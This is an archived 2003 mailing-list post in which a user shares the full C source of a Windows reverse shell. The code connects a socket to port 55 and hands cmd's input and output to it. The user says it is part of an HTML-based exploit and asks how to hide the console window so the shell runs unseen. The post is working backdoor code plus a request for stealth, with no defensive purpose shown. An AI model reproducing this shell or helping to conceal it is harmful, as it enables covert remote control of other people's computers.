Hi all, I am using a basic reverse shell written in C as part of an html based exploit recently revealed by malware.com. it uses WSAStartup() and CreateProcess(). I'm looking for a way to hide the console created by CreateProcess. I’ve tried freeconsole() with no params as suggested by some sources, however this does not work. Any ideas would be appreciated. Thanks P.S. code i'm using is #include <winsock2.h> #include <stdio.h> #include <windows.h> #pragma comment(lib,"ws2_32") void main(int argc, char *argv[]) { // FreeConsole(); WSADATA wsaData; SOCKET hSocket; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in adik_sin; memset(&adik_sin,0,sizeof(adik_sin)); memset(&si,0,sizeof(si)); WSAStartup(MAKEWORD(2,0),&wsaData); hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); adik_sin.sin_family = AF_INET; adik_sin.sin_port = htons(55); adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1"); connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin)); si.cb = sizeof(si); si.dwFlags = STARTF_USESTDHANDLES; si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi); ExitProcess(0); } _________________________________________________________________ Overloaded with spam? With MSN 8, you can filter it out http://join.msn.com/?page=features/junkmail&pgmarket=en-gb&XAPID=32&DI=1059
This archive was generated by hypermail 2b30 : Wed Feb 26 2003 - 08:20:50 PST